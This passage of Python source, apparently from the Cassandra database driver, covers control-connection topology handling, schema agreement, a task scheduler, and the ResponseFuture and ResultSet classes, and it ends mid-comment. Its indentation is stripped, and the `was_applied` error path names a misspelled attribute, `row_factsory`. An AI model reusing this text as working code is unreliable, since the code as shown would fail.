tokens = row.get("tokens", None)
if 'tokens' in row and not tokens: # it was selected, but empty
log.warning("Excluding host (%s) with no tokens in system.peers table of %s." % (addr, connection.host))
continue
if addr in found_hosts:
log.warning("Found multiple hosts with the same rpc_address (%s). Excluding peer %s", addr, row.get("peer"))
continue
found_hosts.add(addr)
host = self._cluster.metadata.get_host(addr)
datacenter = row.get("data_center")
rack = row.get("rack")
if host is None:
log.debug("[control connection] Found new host to connect to: %s", addr)
host, _ = self._cluster.add_host(addr, datacenter, rack, signal=True, refresh_nodes=False)
should_rebuild_token_map = True
else:
should_rebuild_token_map |= self._update_location_info(host, datacenter, rack)
host.broadcast_address = row.get("peer")
host.release_version = row.get("release_version")
host.dse_version = row.get("dse_version")
host.dse_workload = row.get("workload")
if partitioner and tokens:
token_map[host] = tokens
for old_host in self._cluster.metadata.all_hosts():
if old_host.address != connection.host and old_host.address not in found_hosts:
should_rebuild_token_map = True
if old_host.address not in self._cluster.contact_points:
log.debug("[control connection] Removing host not found in peers metadata: %r", old_host)
self._cluster.remove_host(old_host)
log.debug("[control connection] Finished fetching ring info")
if partitioner and should_rebuild_token_map:
log.debug("[control connection] Rebuilding token map due to topology changes")
self._cluster.metadata.rebuild_token_map(partitioner, token_map)
def _update_location_info(self, host, datacenter, rack):
if host.datacenter == datacenter and host.rack == rack:
return False
# If the dc/rack information changes, we need to update the load balancing policy.
# For that, we remove and re-add the node against the policy. Not the most elegant, and assumes
# that the policy will update correctly, but in practice this should work.
self._cluster.load_balancing_policy.on_down(host)
host.set_location_info(datacenter, rack)
self._cluster.load_balancing_policy.on_up(host)
return True
def _delay_for_event_type(self, event_type, delay_window):
# this serves to order processing of correlated events (received within the window)
# the window and randomization still have the desired effect of skew across client instances
next_time = self._event_schedule_times.get(event_type, 0)
now = self._time.time()
if now <= next_time:
this_time = next_time + 0.01
delay = this_time - now
else:
delay = random() * delay_window
this_time = now + delay
self._event_schedule_times[event_type] = this_time
return delay
def _refresh_nodes_if_not_up(self, addr):
"""
Used to mitigate refreshes for nodes that are already known.
Some versions of the server send superfluous NEW_NODE messages in addition to UP events.
"""
host = self._cluster.metadata.get_host(addr)
if not host or not host.is_up:
self.refresh_node_list_and_token_map()
def _handle_topology_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
if change_type == "NEW_NODE" or change_type == "MOVED_NODE":
if self._topology_event_refresh_window >= 0:
delay = self._delay_for_event_type('topology_change', self._topology_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self._refresh_nodes_if_not_up, addr)
elif change_type == "REMOVED_NODE":
host = self._cluster.metadata.get_host(addr)
self._cluster.scheduler.schedule_unique(0, self._cluster.remove_host, host)
def _handle_status_change(self, event):
change_type = event["change_type"]
addr = self._translate_address(event["address"][0])
host = self._cluster.metadata.get_host(addr)
if change_type == "UP":
delay = self._delay_for_event_type('status_change', self._status_event_refresh_window)
if host is None:
# this is the first time we've seen the node
self._cluster.scheduler.schedule_unique(delay, self.refresh_node_list_and_token_map)
else:
self._cluster.scheduler.schedule_unique(delay, self._cluster.on_up, host)
elif change_type == "DOWN":
# Note that there is a slight risk we receive the event late and thus
# mark the host down even though we had already reconnected successfully.
# But that is unlikely and has little consequence, since we'll try reconnecting
# right away, so we favor the detection to make Host.is_up more accurate.
if host is not None:
# this will be run by the scheduler
self._cluster.on_down(host, is_host_addition=False)
def _translate_address(self, addr):
return self._cluster.address_translator.translate(addr)
def _handle_schema_change(self, event):
if self._schema_event_refresh_window < 0:
return
delay = self._delay_for_event_type('schema_change', self._schema_event_refresh_window)
self._cluster.scheduler.schedule_unique(delay, self.refresh_schema, **event)
def wait_for_schema_agreement(self, connection=None, preloaded_results=None, wait_time=None):
total_timeout = wait_time if wait_time is not None else self._cluster.max_schema_agreement_wait
if total_timeout <= 0:
return True
# Each schema change typically generates two schema refreshes, one
# from the response type and one from the pushed notification. Holding
# a lock is just a simple way to cut down on the number of schema queries
# we'll make.
with self._schema_agreement_lock:
if self._is_shutdown:
return
if not connection:
connection = self._connection
if preloaded_results:
log.debug("[control connection] Attempting to use preloaded results for schema agreement")
peers_result = preloaded_results[0]
local_result = preloaded_results[1]
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Waiting for schema agreement")
start = self._time.time()
elapsed = 0
cl = ConsistencyLevel.ONE
schema_mismatches = None
while elapsed < total_timeout:
peers_query = QueryMessage(query=self._SELECT_SCHEMA_PEERS, consistency_level=cl)
local_query = QueryMessage(query=self._SELECT_SCHEMA_LOCAL, consistency_level=cl)
try:
timeout = min(self._timeout, total_timeout - elapsed)
peers_result, local_result = connection.wait_for_responses(
peers_query, local_query, timeout=timeout)
except OperationTimedOut as timeout:
log.debug("[control connection] Timed out waiting for "
"response during schema agreement check: %s", timeout)
elapsed = self._time.time() - start
continue
except ConnectionShutdown:
if self._is_shutdown:
log.debug("[control connection] Aborting wait for schema match due to shutdown")
return None
else:
raise
schema_mismatches = self._get_schema_mismatches(peers_result, local_result, connection.host)
if schema_mismatches is None:
return True
log.debug("[control connection] Schemas mismatched, trying again")
self._time.sleep(0.2)
elapsed = self._time.time() - start
log.warning("Node %s is reporting a schema disagreement: %s",
connection.host, schema_mismatches)
return False
def _get_schema_mismatches(self, peers_result, local_result, local_address):
peers_result = dict_factory(*peers_result.results)
versions = defaultdict(set)
if local_result.results:
local_row = dict_factory(*local_result.results)[0]
if local_row.get("schema_version"):
versions[local_row.get("schema_version")].add(local_address)
lbp = self._cluster.load_balancing_policy
for row in peers_result:
schema_ver = row.get('schema_version')
if not schema_ver:
continue
addr = self._rpc_from_peer_row(row)
peer = self._cluster.metadata.get_host(addr)
if peer and peer.is_up and lbp.distance(peer) != HostDistance.IGNORED:
versions[schema_ver].add(addr)
if len(versions) == 1:
log.debug("[control connection] Schemas match")
return None
return dict((version, list(nodes)) for version, nodes in six.iteritems(versions))
def _rpc_from_peer_row(self, row):
addr = row.get("rpc_address")
if not addr or addr in ["0.0.0.0", "::"]:
addr = row.get("peer")
return self._translate_address(addr)
def _signal_error(self):
with self._lock:
if self._is_shutdown:
return
# try just signaling the cluster, as this will trigger a reconnect
# as part of marking the host down
if self._connection and self._connection.is_defunct:
host = self._cluster.metadata.get_host(self._connection.host)
# host may be None if it's already been removed, but that indicates
# that errors have already been reported, so we're fine
if host:
self._cluster.signal_connection_failure(
host, self._connection.last_error, is_host_addition=False)
return
# if the connection is not defunct or the host already left, reconnect
# manually
self.reconnect()
def on_up(self, host):
pass
def on_down(self, host):
conn = self._connection
if conn and conn.host == host.address and \
self._reconnection_handler is None:
log.debug("[control connection] Control connection host (%s) is "
"considered down, starting reconnection", host)
# this will result in a task being submitted to the executor to reconnect
self.reconnect()
def on_add(self, host, refresh_nodes=True):
if refresh_nodes:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def on_remove(self, host):
c = self._connection
if c and c.host == host.address:
log.debug("[control connection] Control connection host (%s) is being removed. Reconnecting", host)
# refresh will be done on reconnect
self.reconnect()
else:
self.refresh_node_list_and_token_map(force_token_rebuild=True)
def get_connections(self):
c = getattr(self, '_connection', None)
return [c] if c else []
def return_connection(self, connection):
if connection is self._connection and (connection.is_defunct or connection.is_closed):
self.reconnect()
def _stop_scheduler(scheduler, thread):
try:
if not scheduler.is_shutdown:
scheduler.shutdown()
except ReferenceError:
pass
thread.join()
class _Scheduler(Thread):
_queue = None
_scheduled_tasks = None
_executor = None
is_shutdown = False
def __init__(self, executor):
self._queue = Queue.PriorityQueue()
self._scheduled_tasks = set()
self._count = count()
self._executor = executor
Thread.__init__(self, name="Task Scheduler")
self.daemon = True
self.start()
def shutdown(self):
try:
log.debug("Shutting down Cluster Scheduler")
except AttributeError:
# this can happen on interpreter shutdown
pass
self.is_shutdown = True
self._queue.put_nowait((0, 0, None))
self.join()
def schedule(self, delay, fn, *args, **kwargs):
self._insert_task(delay, (fn, args, tuple(kwargs.items())))
def schedule_unique(self, delay, fn, *args, **kwargs):
task = (fn, args, tuple(kwargs.items()))
if task not in self._scheduled_tasks:
self._insert_task(delay, task)
else:
log.debug("Ignoring schedule_unique for already-scheduled task: %r", task)
def _insert_task(self, delay, task):
if not self.is_shutdown:
run_at = time.time() + delay
self._scheduled_tasks.add(task)
self._queue.put_nowait((run_at, next(self._count), task))
else:
log.debug("Ignoring scheduled task after shutdown: %r", task)
def run(self):
while True:
if self.is_shutdown:
return
try:
while True:
run_at, i, task = self._queue.get(block=True, timeout=None)
if self.is_shutdown:
if task:
log.debug("Not executing scheduled task due to Scheduler shutdown")
return
if run_at <= time.time():
self._scheduled_tasks.discard(task)
fn, args, kwargs = task
kwargs = dict(kwargs)
future = self._executor.submit(fn, *args, **kwargs)
future.add_done_callback(self._log_if_failed)
else:
self._queue.put_nowait((run_at, i, task))
break
except Queue.Empty:
pass
time.sleep(0.1)
def _log_if_failed(self, future):
exc = future.exception()
if exc:
log.warning(
"An internally scheduled tasked failed with an unhandled exception:",
exc_info=exc)
def refresh_schema_and_set_result(control_conn, response_future, **kwargs):
try:
log.debug("Refreshing schema in response to schema change. "
"%s", kwargs)
response_future.is_schema_agreed = control_conn._refresh_schema(response_future._connection, **kwargs)
except Exception:
log.exception("Exception refreshing schema in response to schema change:")
response_future.session.submit(control_conn.refresh_schema, **kwargs)
finally:
response_future._set_final_result(None)
class ResponseFuture(object):
"""
An asynchronous response delivery mechanism that is returned from calls
to :meth:`.Session.execute_async()`.
There are two ways for results to be delivered:
- Synchronously, by calling :meth:`.result()`
- Asynchronously, by attaching callback and errback functions via
:meth:`.add_callback()`, :meth:`.add_errback()`, and
:meth:`.add_callbacks()`.
"""
query = None
"""
The :class:`~.Statement` instance that is being executed through this
:class:`.ResponseFuture`.
"""
is_schema_agreed = True
"""
For DDL requests, this may be set to ``False`` if the schema agreement poll after the response fails.
Always ``True`` for non-DDL requests.
"""
session = None
row_factory = None
message = None
default_timeout = None
_req_id = None
_final_result = _NOT_SET
_col_names = None
_final_exception = None
_query_traces = None
_callbacks = None
_errbacks = None
_current_host = None
_current_pool = None
_connection = None
_query_retries = 0
_start_time = None
_metrics = None
_paging_state = None
_custom_payload = None
_warnings = None
_timer = None
_protocol_handler = ProtocolHandler
_warned_timeout = False
def __init__(self, session, message, query, timeout, metrics=None, prepared_statement=None):
self.session = session
self.row_factory = session.row_factory
self.message = message
self.query = query
self.timeout = timeout
self._metrics = metrics
self.prepared_statement = prepared_statement
self._callback_lock = Lock()
if metrics is not None:
self._start_time = time.time()
self._make_query_plan()
self._event = Event()
self._errors = {}
self._callbacks = []
self._errbacks = []
def _start_timer(self):
if self.timeout is not None:
self._timer = self.session.cluster.connection_class.create_timer(self.timeout, self._on_timeout)
def _cancel_timer(self):
if self._timer:
self._timer.cancel()
def _on_timeout(self):
errors = self._errors
if not errors:
if self.is_schema_agreed:
errors = {self._current_host.address: "Client request timeout. See Session.execute[_async](timeout)"}
else:
connection = getattr(self.session.cluster.control_connection, '_connection')
host = connection.host if connection else 'unknown'
errors = {host: "Request timed out while waiting for schema agreement. See Session.execute[_async](timeout) and Cluster.max_schema_agreement_wait."}
self._set_final_exception(OperationTimedOut(errors, self._current_host))
def _make_query_plan(self):
# convert the list/generator/etc to an iterator so that subsequent
# calls to send_request (which retries may do) will resume where
# they last left off
self.query_plan = iter(self.session._load_balancer.make_query_plan(
self.session.keyspace, self.query))
def send_request(self):
""" Internal """
# query_plan is an iterator, so this will resume where we last left
# off if send_request() is called multiple times
start = time.time()
for host in self.query_plan:
req_id = self._query(host)
if req_id is not None:
self._req_id = req_id
# timer is only started here, after we have at least one message queued
# this is done to avoid overrun of timers with unfettered client requests
# in the case of full disconnect, where no hosts will be available
if self._timer is None:
self._start_timer()
return
if self.timeout is not None and time.time() - start > self.timeout:
self._on_timeout()
return
self._set_final_exception(NoHostAvailable(
"Unable to complete the operation against any hosts", self._errors))
def _query(self, host, message=None, cb=None):
if message is None:
message = self.message
if cb is None:
cb = self._set_result
pool = self.session._pools.get(host)
if not pool:
self._errors[host] = ConnectionException("Host has been marked down or removed")
return None
elif pool.is_shutdown:
self._errors[host] = ConnectionException("Pool is shutdown")
return None
self._current_host = host
self._current_pool = pool
connection = None
try:
# TODO get connectTimeout from cluster settings
connection, request_id = pool.borrow_connection(timeout=2.0)
self._connection = connection
connection.send_msg(message, request_id, cb=cb, encoder=self._protocol_handler.encode_message, decoder=self._protocol_handler.decode_message)
return request_id
except NoConnectionsAvailable as exc:
log.debug("All connections for host %s are at capacity, moving to the next host", host)
self._errors[host] = exc
return None
except Exception as exc:
log.debug("Error querying host %s", host, exc_info=True)
self._errors[host] = exc
if self._metrics is not None:
self._metrics.on_connection_error()
if connection:
pool.return_connection(connection)
return None
@property
def has_more_pages(self):
"""
Returns :const:`True` if there are more pages left in the
query results, :const:`False` otherwise. This should only
be checked after the first page has been returned.
.. versionadded:: 2.0.0
"""
return self._paging_state is not None
@property
def warnings(self):
"""
Warnings returned from the server, if any. This will only be
set for protocol_version 4+.
Warnings may be returned for such things as oversized batches,
or too many tombstones in slice queries.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may raise an exception if the response has not been received.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("warnings cannot be retrieved before ResponseFuture is finalized")
return self._warnings
@property
def custom_payload(self):
"""
The custom payload returned from the server, if any. This will only be
set by Cassandra servers implementing a custom QueryHandler, and only
for protocol_version 4+.
Ensure the future is complete before trying to access this property
(call :meth:`.result()`, or after callback is invoked).
Otherwise it may raise an exception if the response has not been received.
:return: :ref:`custom_payload`.
"""
# TODO: When timers are introduced, just make this wait
if not self._event.is_set():
raise DriverException("custom_payload cannot be retrieved before ResponseFuture is finalized")
return self._custom_payload
def start_fetching_next_page(self):
"""
If there are more pages left in the query result, this asynchronously
starts fetching the next page. If there are no pages left, :exc:`.QueryExhausted`
is raised. Also see :attr:`.has_more_pages`.
This should only be called after the first page has been returned.
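A rough sketch of driving paging through callbacks (``mytable`` is
hypothetical, and a real handler should also register an errback)::
>>> def handle_page(rows, future):
...     for row in rows:
...         log.info("row: %s", row)
...     if future.has_more_pages:
...         future.start_fetching_next_page()
>>> future = session.execute_async("SELECT * FROM mytable")
>>> future.add_callback(handle_page, future)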
.. versionadded:: 2.0.0
"""
if not self._paging_state:
raise QueryExhausted()
self._make_query_plan()
self.message.paging_state = self._paging_state
self._event.clear()
self._final_result = _NOT_SET
self._final_exception = None
self._timer = None # clear cancelled timer; new one will be set when request is queued
self.send_request()
def _reprepare(self, prepare_message):
cb = partial(self.session.submit, self._execute_after_prepare)
request_id = self._query(self._current_host, prepare_message, cb=cb)
if request_id is None:
# try to submit the original prepared statement on some other host
self.send_request()
def _set_result(self, response):
try:
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
trace_id = getattr(response, 'trace_id', None)
if trace_id:
if not self._query_traces:
self._query_traces = []
self._query_traces.append(QueryTrace(trace_id, self.session))
self._warnings = getattr(response, 'warnings', None)
self._custom_payload = getattr(response, 'custom_payload', None)
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_SET_KEYSPACE:
session = getattr(self, 'session', None)
# since we're running on the event loop thread, we need to
# use a non-blocking method for setting the keyspace on
# all connections in this session, otherwise the event
# loop thread will deadlock waiting for keyspaces to be
# set. This uses a callback chain which ends with
# self._set_keyspace_completed() being called in the
# event loop thread.
if session:
session._set_keyspace_for_all_pools(
response.results, self._set_keyspace_completed)
elif response.kind == RESULT_KIND_SCHEMA_CHANGE:
# refresh the schema before responding, but do it in another
# thread instead of the event loop thread
self.is_schema_agreed = False
self.session.submit(
refresh_schema_and_set_result,
self.session.cluster.control_connection,
self, **response.results)
else:
results = getattr(response, 'results', None)
if results is not None and response.kind == RESULT_KIND_ROWS:
self._paging_state = response.paging_state
self._col_names = results[0]
results = self.row_factory(*results)
self._set_final_result(results)
elif isinstance(response, ErrorMessage):
retry_policy = None
if self.query:
retry_policy = self.query.retry_policy
if not retry_policy:
retry_policy = self.session.cluster.default_retry_policy
if isinstance(response, ReadTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_read_timeout()
retry = retry_policy.on_read_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, WriteTimeoutErrorMessage):
if self._metrics is not None:
self._metrics.on_write_timeout()
retry = retry_policy.on_write_timeout(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, UnavailableErrorMessage):
if self._metrics is not None:
self._metrics.on_unavailable()
retry = retry_policy.on_unavailable(
self.query, retry_num=self._query_retries, **response.info)
elif isinstance(response, OverloadedErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
log.warning("Host %s is overloaded, retrying against a different "
"host", self._current_host)
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, IsBootstrappingErrorMessage):
if self._metrics is not None:
self._metrics.on_other_error()
# need to retry against a different host here
self._retry(reuse_connection=False, consistency_level=None)
return
elif isinstance(response, PreparedQueryNotFound):
if self.prepared_statement:
query_id = self.prepared_statement.query_id
assert query_id == response.info, \
"Got different query ID in server response (%s) than we " \
"had before (%s)" % (response.info, query_id)
else:
query_id = response.info
try:
prepared_statement = self.session.cluster._prepared_statements[query_id]
except KeyError:
if not self.prepared_statement:
log.error("Tried to execute unknown prepared statement: id=%s",
query_id.encode('hex'))
self._set_final_exception(response)
return
else:
prepared_statement = self.prepared_statement
self.session.cluster._prepared_statements[query_id] = prepared_statement
current_keyspace = self._connection.keyspace
prepared_keyspace = prepared_statement.keyspace
if prepared_keyspace and current_keyspace != prepared_keyspace:
self._set_final_exception(
ValueError("The Session's current keyspace (%s) does "
"not match the keyspace the statement was "
"prepared with (%s)" %
(current_keyspace, prepared_keyspace)))
return
log.debug("Re-preparing unrecognized prepared statement against host %s: %s",
self._current_host, prepared_statement.query_string)
prepare_message = PrepareMessage(query=prepared_statement.query_string)
# since this might block, run on the executor to avoid hanging
# the event loop thread
self.session.submit(self._reprepare, prepare_message)
return
else:
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
return
retry_type, consistency = retry
if retry_type in (RetryPolicy.RETRY, RetryPolicy.RETRY_NEXT_HOST):
self._query_retries += 1
reuse = retry_type == RetryPolicy.RETRY
self._retry(reuse_connection=reuse, consistency_level=consistency)
elif retry_type is RetryPolicy.RETHROW:
self._set_final_exception(response.to_exception())
else: # IGNORE
if self._metrics is not None:
self._metrics.on_ignore()
self._set_final_result(None)
self._errors[self._current_host] = response.to_exception()
elif isinstance(response, ConnectionException):
if self._metrics is not None:
self._metrics.on_connection_error()
if not isinstance(response, ConnectionShutdown):
self._connection.defunct(response)
self._retry(reuse_connection=False, consistency_level=None)
elif isinstance(response, Exception):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
else:
# we got some other kind of response message
msg = "Got unexpected message: %r" % (response,)
exc = ConnectionException(msg, self._current_host)
self._connection.defunct(exc)
self._set_final_exception(exc)
except Exception as exc:
# almost certainly caused by a bug, but we need to set something here
log.exception("Unexpected exception while handling result in ResponseFuture:")
self._set_final_exception(exc)
def _set_keyspace_completed(self, errors):
if not errors:
self._set_final_result(None)
else:
self._set_final_exception(ConnectionException(
"Failed to set keyspace on all hosts: %s" % (errors,)))
def _execute_after_prepare(self, response):
"""
Handle the response to our attempt to prepare a statement.
If it succeeded, run the original query again against the same host.
"""
if self._current_pool and self._connection:
self._current_pool.return_connection(self._connection)
if self._final_exception:
return
if isinstance(response, ResultMessage):
if response.kind == RESULT_KIND_PREPARED:
# use self._query to re-use the same host and
# at the same time properly borrow the connection
request_id = self._query(self._current_host)
if request_id is None:
# this host errored out, move on to the next
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response when preparing statement "
"on host %s: %s" % (self._current_host, response)))
elif isinstance(response, ErrorMessage):
if hasattr(response, 'to_exception'):
self._set_final_exception(response.to_exception())
else:
self._set_final_exception(response)
elif isinstance(response, ConnectionException):
log.debug("Connection error when preparing statement on host %s: %s",
self._current_host, response)
# try again on a different host, preparing again if necessary
self._errors[self._current_host] = response
self.send_request()
else:
self._set_final_exception(ConnectionException(
"Got unexpected response type when preparing "
"statement on host %s: %s" % (self._current_host, response)))
def _set_final_result(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_result = response
self._event.set()
# apply each callback
for callback in self._callbacks:
fn, args, kwargs = callback
fn(response, *args, **kwargs)
def _set_final_exception(self, response):
self._cancel_timer()
if self._metrics is not None:
self._metrics.request_timer.addValue(time.time() - self._start_time)
with self._callback_lock:
self._final_exception = response
self._event.set()
for errback in self._errbacks:
fn, args, kwargs = errback
fn(response, *args, **kwargs)
def _retry(self, reuse_connection, consistency_level):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if self._metrics is not None:
self._metrics.on_retry()
if consistency_level is not None:
self.message.consistency_level = consistency_level
# don't retry on the event loop thread
self.session.submit(self._retry_task, reuse_connection)
def _retry_task(self, reuse_connection):
if self._final_exception:
# the connection probably broke while we were waiting
# to retry the operation
return
if reuse_connection and self._query(self._current_host) is not None:
return
# otherwise, move onto another host
self.send_request()
def result(self):
"""
Return the final result or raise an Exception if errors were
encountered. If the final result or error has not been set
yet, this method will block until it is set, or the timeout
set for the request expires.
Timeout is specified in the Session request execution functions.
If the timeout is exceeded, an :exc:`cassandra.OperationTimedOut` will be raised.
This is a client-side timeout. For more information
about server-side coordinator timeouts, see :class:`.policies.RetryPolicy`.
Example usage::
>>> future = session.execute_async("SELECT * FROM mycf")
>>> # do other stuff...
>>> try:
... rows = future.result()
... for row in rows:
... ... # process results
... except Exception:
... log.exception("Operation failed:")
"""
self._event.wait()
if self._final_result is not _NOT_SET:
return ResultSet(self, self._final_result)
else:
raise self._final_exception
def get_query_trace_ids(self):
"""
Returns the trace session ids for this future, if tracing was enabled (does not fetch trace data).
"""
return [trace.trace_id for trace in self._query_traces]
def get_query_trace(self, max_wait=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query trace of the last response, or `None` if tracing was
not enabled.
Note that this may raise an exception if there are problems retrieving the trace
details from Cassandra. If the trace is not available after `max_wait`,
:exc:`cassandra.query.TraceUnavailable` will be raised.
`query_cl` is the consistency level used to poll the trace tables.
"""
if self._query_traces:
return self._get_query_trace(len(self._query_traces) - 1, max_wait, query_cl)
def get_all_query_traces(self, max_wait_per=None, query_cl=ConsistencyLevel.LOCAL_ONE):
"""
Fetches and returns the query traces for all query pages, if tracing was enabled.
See note in :meth:`~.get_query_trace` regarding possible exceptions.
"""
if self._query_traces:
return [self._get_query_trace(i, max_wait_per, query_cl) for i in range(len(self._query_traces))]
return []
def _get_query_trace(self, i, max_wait, query_cl):
trace = self._query_traces[i]
if not trace.events:
trace.populate(max_wait=max_wait, query_cl=query_cl)
return trace
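    # A minimal sketch of fetching a trace with the methods above, assuming a connected
    # `session` obtained from cassandra.cluster.Cluster (the names below are
    # illustrative and not defined in this class):
    #     future = session.execute_async("SELECT * FROM users", trace=True)
    #     rows = future.result()
    #     trace = future.get_query_trace(max_wait=2.0)
    #     if trace:
    #         for event in trace.events:
    #             print(event.description, event.source_elapsed)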
def add_callback(self, fn, *args, **kwargs):
"""
Attaches a callback function to be called when the final results arrive.
By default, `fn` will be called with the results as the first and only
argument. If `*args` or `**kwargs` are supplied, they will be passed
through as additional positional or keyword arguments to `fn`.
If an error is hit while executing the operation, a callback attached
here will not be called. Use :meth:`.add_errback()` or :meth:`add_callbacks()`
if you wish to handle that case.
If the final result has already been seen when this method is called,
the callback will be called immediately (before this method returns).
Note: in the case that the result is not available when the callback is added,
        the callback is executed by the IO event thread. This means that the callback
should not block or attempt further synchronous requests, because no further
IO will be processed until the callback returns.
**Important**: if the callback you attach results in an exception being
raised, **the exception will be ignored**, so please ensure your
callback handles all error cases that you care about.
Usage example::
>>> session = cluster.connect("mykeyspace")
>>> def handle_results(rows, start_time, should_log=False):
... if should_log:
... log.info("Total time: %f", time.time() - start_time)
... ...
>>> future = session.execute_async("SELECT * FROM users")
>>> future.add_callback(handle_results, time.time(), should_log=True)
"""
run_now = False
with self._callback_lock:
if self._final_result is not _NOT_SET:
run_now = True
else:
self._callbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_result, *args, **kwargs)
return self
def add_errback(self, fn, *args, **kwargs):
"""
Like :meth:`.add_callback()`, but handles error cases.
An Exception instance will be passed as the first positional argument
to `fn`.
"""
run_now = False
with self._callback_lock:
if self._final_exception:
run_now = True
else:
self._errbacks.append((fn, args, kwargs))
if run_now:
fn(self._final_exception, *args, **kwargs)
return self
def add_callbacks(self, callback, errback,
callback_args=(), callback_kwargs=None,
errback_args=(), errback_kwargs=None):
"""
A convenient combination of :meth:`.add_callback()` and
:meth:`.add_errback()`.
Example usage::
>>> session = cluster.connect()
>>> query = "SELECT * FROM mycf"
>>> future = session.execute_async(query)
>>> def log_results(results, level='debug'):
... for row in results:
... log.log(level, "Result: %s", row)
>>> def log_error(exc, query):
... log.error("Query '%s' failed: %s", query, exc)
>>> future.add_callbacks(
... callback=log_results, callback_kwargs={'level': 'info'},
... errback=log_error, errback_args=(query,))
"""
self.add_callback(callback, *callback_args, **(callback_kwargs or {}))
self.add_errback(errback, *errback_args, **(errback_kwargs or {}))
def clear_callbacks(self):
with self._callback_lock:
            # reset the registered callback and errback lists
            self._callbacks = []
            self._errbacks = []
def __str__(self):
result = "(no result yet)" if self._final_result is _NOT_SET else self._final_result
return "<ResponseFuture: query='%s' request_id=%s result=%s exception=%s host=%s>" \
% (self.query, self._req_id, result, self._final_exception, self._current_host)
__repr__ = __str__
class QueryExhausted(Exception):
"""
Raised when :meth:`.ResponseFuture.start_fetching_next_page()` is called and
there are no more pages. You can check :attr:`.ResponseFuture.has_more_pages`
before calling to avoid this.
.. versionadded:: 2.0.0
"""
pass
class ResultSet(object):
"""
An iterator over the rows from a query result. Also supplies basic equality
    and indexing methods for backward-compatibility. These methods materialize
the entire result set (loading all pages), and should only be used if the
total result size is understood. Warnings are emitted when paged results
are materialized in this fashion.
You can treat this as a normal iterator over rows::
>>> from cassandra.query import SimpleStatement
>>> statement = SimpleStatement("SELECT * FROM users", fetch_size=10)
>>> for user_row in session.execute(statement):
... process_user(user_row)
Whenever there are no more rows in the current page, the next page will
be fetched transparently. However, note that it *is* possible for
an :class:`Exception` to be raised while fetching the next page, just
like you might see on a normal call to ``session.execute()``.
"""
def __init__(self, response_future, initial_response):
self.response_future = response_future
self.column_names = response_future._col_names
self._set_current_rows(initial_response)
self._page_iter = None
self._list_mode = False
@property
def has_more_pages(self):
"""
True if the last response indicated more pages; False otherwise
"""
return self.response_future.has_more_pages
@property
def current_rows(self):
"""
The list of current page rows. May be empty if the result was empty,
or this is the last page.
"""
return self._current_rows or []
def __iter__(self):
if self._list_mode:
return iter(self._current_rows)
self._page_iter = iter(self._current_rows)
return self
def next(self):
try:
return next(self._page_iter)
except StopIteration:
if not self.response_future.has_more_pages:
if not self._list_mode:
self._current_rows = []
raise
self.fetch_next_page()
self._page_iter = iter(self._current_rows)
return next(self._page_iter)
__next__ = next
def fetch_next_page(self):
"""
Manually, synchronously fetch the next page. Supplied for manually retrieving pages
        and inspecting :attr:`~.current_rows`. It is not necessary to call this when iterating
through results; paging happens implicitly in iteration.
"""
if self.response_future.has_more_pages:
self.response_future.start_fetching_next_page()
result = self.response_future.result()
            self._current_rows = result._current_rows  # the new ResultSet has already called _set_current_rows, so rows are in the appropriate form
else:
self._current_rows = []
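    # A minimal sketch of manual paging with the method above, assuming a connected
    # `session`, `from cassandra.query import SimpleStatement`, and a placeholder
    # `process` function for application logic:
    #     result = session.execute(SimpleStatement("SELECT * FROM users", fetch_size=100))
    #     while True:
    #         for row in result.current_rows:
    #             process(row)
    #         if not result.has_more_pages:
    #             break
    #         result.fetch_next_page()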
def _set_current_rows(self, result):
if isinstance(result, Mapping):
self._current_rows = [result] if result else []
return
try:
iter(result) # can't check directly for generator types because cython generators are different
self._current_rows = result
except TypeError:
self._current_rows = [result] if result else []
def _fetch_all(self):
self._current_rows = list(self)
self._page_iter = None
def _enter_list_mode(self, operator):
if self._list_mode:
return
if self._page_iter:
raise RuntimeError("Cannot use %s when results have been iterated." % operator)
if self.response_future.has_more_pages:
log.warning("Using %s on paged results causes entire result set to be materialized.", operator)
self._fetch_all() # done regardless of paging status in case the row factory produces a generator
self._list_mode = True
def __eq__(self, other):
self._enter_list_mode("equality operator")
return self._current_rows == other
def __getitem__(self, i):
self._enter_list_mode("index operator")
return self._current_rows[i]
def __nonzero__(self):
return bool(self._current_rows)
__bool__ = __nonzero__
def get_query_trace(self, max_wait_sec=None):
"""
Gets the last query trace from the associated future.
See :meth:`.ResponseFuture.get_query_trace` for details.
"""
return self.response_future.get_query_trace(max_wait_sec)
def get_all_query_traces(self, max_wait_sec_per=None):
"""
Gets all query traces from the associated future.
See :meth:`.ResponseFuture.get_all_query_traces` for details.
"""
return self.response_future.get_all_query_traces(max_wait_sec_per)
@property
def was_applied(self):
"""
For LWT results, returns whether the transaction was applied.
Result is indeterminate if called on a result that was not an LWT request.
        Only valid when one of the internal row factories is in use.
"""
if self.response_future.row_factory not in (named_tuple_factory, dict_factory, tuple_factory):
raise RuntimeError("Cannot determine LWT result with row factory %s" % (self.response_future.row_factsory,))
if len(self.current_rows) != 1:
raise RuntimeError("LWT result should have exactly one row. This has %d." % (len(self.current_rows)))
row = self.current_rows[0]
if isinstance(row, tuple):
return row[0]
else:
return row['[applied]']
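# A minimal sketch of checking a lightweight-transaction result with the property above,
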